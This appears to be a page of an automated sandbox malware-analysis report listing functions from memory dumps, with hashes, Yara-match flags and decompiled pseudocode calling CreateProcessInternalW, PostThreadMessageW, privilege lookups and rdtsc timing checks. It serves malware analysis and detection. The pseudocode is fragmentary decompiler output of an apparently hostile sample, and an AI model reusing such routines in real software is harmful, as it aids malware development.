                                                                                                                                                                Function 00B2FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B2FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                			E004088A0(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(0, _t52, _t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}






















                                                                                                                                                                0x004088ab
                                                                                                                                                                0x004088b3
                                                                                                                                                                0x004088b5
                                                                                                                                                                0x004088ba
                                                                                                                                                                0x004088bf
                                                                                                                                                                0x004088d2
                                                                                                                                                                0x004088d7
                                                                                                                                                                0x004088e0
                                                                                                                                                                0x004088ec
                                                                                                                                                                0x004088ff
                                                                                                                                                                0x00408904
                                                                                                                                                                0x00408907
                                                                                                                                                                0x00408910
                                                                                                                                                                0x00408922
                                                                                                                                                                0x00408927
                                                                                                                                                                0x0040892c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040892e
                                                                                                                                                                0x00408932
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00408934
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00408932
                                                                                                                                                                0x00408936
                                                                                                                                                                0x00408939
                                                                                                                                                                0x0040893f
                                                                                                                                                                0x00408941
                                                                                                                                                                0x0040894c
                                                                                                                                                                0x00408951
                                                                                                                                                                0x00408954
                                                                                                                                                                0x00408961
                                                                                                                                                                0x0040896c
                                                                                                                                                                0x0040896e
                                                                                                                                                                0x00408974
                                                                                                                                                                0x00408978
                                                                                                                                                                0x0040897b
                                                                                                                                                                0x0040897b
                                                                                                                                                                0x00408982
                                                                                                                                                                0x00408985
                                                                                                                                                                0x0040898a
                                                                                                                                                                0x00408997
                                                                                                                                                                0x004088c6
                                                                                                                                                                0x004088c6
                                                                                                                                                                0x004088c6

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                                                                                • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                                                                                                                • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                                                                                • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004185C6, Relevance: 1.6, APIs: 1, Instructions: 60processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: bd966df7982c8f4e43f6b4dda9e9ec4006021975d215d172f2752bcf04dc7b40
                                                                                                                                                                • Instruction ID: f6a6b1819d7e9dc7fd280de797c84ab4fc03c2e17297dbdf5c414aadd72d5619
                                                                                                                                                                • Opcode Fuzzy Hash: bd966df7982c8f4e43f6b4dda9e9ec4006021975d215d172f2752bcf04dc7b40
                                                                                                                                                                • Instruction Fuzzy Hash: E41100B2200108AFCB14CF99EC80DEB77A9AF9C354F018249FA0C97241CA30E852CBB4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                			E00407260(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0(__ebx,  &_v68, 3);
				_t12 = E00409B10(_t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                                                                0x00407260
                                                                                                                                                                0x0040726f
                                                                                                                                                                0x00407273
                                                                                                                                                                0x0040727e
                                                                                                                                                                0x0040728e
                                                                                                                                                                0x0040729e
                                                                                                                                                                0x004072a3
                                                                                                                                                                0x004072aa
                                                                                                                                                                0x004072ad
                                                                                                                                                                0x004072ba
                                                                                                                                                                0x004072bc
                                                                                                                                                                0x004072be
                                                                                                                                                                0x004072db
                                                                                                                                                                0x004072db
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004072dd
                                                                                                                                                                0x004072e2

                                                                                                                                                                APIs
                                                                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                                                                                • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                                                                                                                • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                                                                                • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                • Opcode ID: 3c56d27983eda2edee2227fefa9078c4f75da7b95f69b7146e58679842737ae6
                                                                                                                                                                • Instruction ID: 8307bd1499ae008de91b4b1a8a787fffd1737cd02353fd86611252a82453a610
                                                                                                                                                                • Opcode Fuzzy Hash: 3c56d27983eda2edee2227fefa9078c4f75da7b95f69b7146e58679842737ae6
                                                                                                                                                                • Instruction Fuzzy Hash: 22F0AFB16043187FCB20EFA4DC45DEB3B68EF85210F00845AF9485B342DA34E91187F5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0041852D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                			E0041852D(void* __eax, void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, signed char _a48, intOrPtr _a52) {
				char _v5;
				signed char _t21;
				void* _t26;
				void* _t28;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t39;
				void* _t40;
				intOrPtr* _t41;
				void* _t43;

				_t28 = __ebx - __ecx;
				_t19 = _a4;
				_t41 = _a4 + 0xc80;
				E00418DB0(_t39, _t19, _t41,  *((intOrPtr*)(_t19 + 0xa14)), 0, 0x37);
				_t35 = _a52;
				_t21 = _a48;
				_t31 = _a44;
				 *(_t28 - 0x74adeb3c) =  *(_t28 - 0x74adeb3c) ^ _t21;
				_t26 =  *((intOrPtr*)( *_t41))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t35, _t31,  &_v5, _t40, _t43); // executed
				return _t26;
			}













                                                                                                                                                                0x0041852d
                                                                                                                                                                0x00418533
                                                                                                                                                                0x00418542
                                                                                                                                                                0x0041854a
                                                                                                                                                                0x0041854f
                                                                                                                                                                0x00418552
                                                                                                                                                                0x00418555
                                                                                                                                                                0x00418557
                                                                                                                                                                0x00418584
                                                                                                                                                                0x00418588

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: 9677f8d018ec6e3977d566ff23e4ea20428135d179658129530337e92df90a3b
                                                                                                                                                                • Instruction ID: d24ee4b4d37115aed461e6ddf82e86eaf883a7d7fa9d013d0385163113724409
                                                                                                                                                                • Opcode Fuzzy Hash: 9677f8d018ec6e3977d566ff23e4ea20428135d179658129530337e92df90a3b
                                                                                                                                                                • Instruction Fuzzy Hash: DE01AFB2211108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00418530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                			E00418530(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, signed char _a48, intOrPtr _a52) {
				char _v5;
				signed char _t19;
				void* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				void* _t35;
				intOrPtr* _t36;

				_t17 = _a4;
				_t36 = _a4 + 0xc80;
				E00418DB0(_t35, _t17, _t36,  *((intOrPtr*)(_t17 + 0xa14)), 0, 0x37);
				_t31 = _a52;
				_t19 = _a48;
				_t27 = _a44;
				 *(__ebx - 0x74adeb3c) =  *(__ebx - 0x74adeb3c) ^ _t19;
				_t24 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t31, _t27,  &_v5); // executed
				return _t24;
			}










                                                                                                                                                                0x00418533
                                                                                                                                                                0x00418542
                                                                                                                                                                0x0041854a
                                                                                                                                                                0x0041854f
                                                                                                                                                                0x00418552
                                                                                                                                                                0x00418555
                                                                                                                                                                0x00418557
                                                                                                                                                                0x00418584
                                                                                                                                                                0x00418588

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                                                                • Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
                                                                                                                                                                • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                                                                • Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                                			E004184B2(void* __eflags) {
				void* __esi;
				void* _t7;

				asm("rol byte [0x418f9a1a], 0xa8");
				if(__eflags >= 0) {
					return _t7;
				} else {
					__ebp = 0x8b556450;
					__ebp = __esp;
					__eax =  *(__ebp + 8);
					_t3 = __eax + 0xc74; // 0xc74
					__esi = _t3;
					__eax =  *(__ebp + 0x10);
					__eax = RtlFreeHeap( *(__ebp + 0xc),  *(__ebp + 0x10),  *(__ebp + 0x14)); // executed
					__esi = __esi;
					__ebp = 0x8b556450;
					return __eax;
				}
			}





                                                                                                                                                                0x004184b4
                                                                                                                                                                0x004184bb
                                                                                                                                                                0x0041847d
                                                                                                                                                                0x004184bd
                                                                                                                                                                0x004184bd
                                                                                                                                                                0x004184c1
                                                                                                                                                                0x004184c3
                                                                                                                                                                0x004184cf
                                                                                                                                                                0x004184cf
                                                                                                                                                                0x004184df
                                                                                                                                                                0x004184ed
                                                                                                                                                                0x004184ef
                                                                                                                                                                0x004184f0
                                                                                                                                                                0x004184f1
                                                                                                                                                                0x004184f1

                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3298025750-0
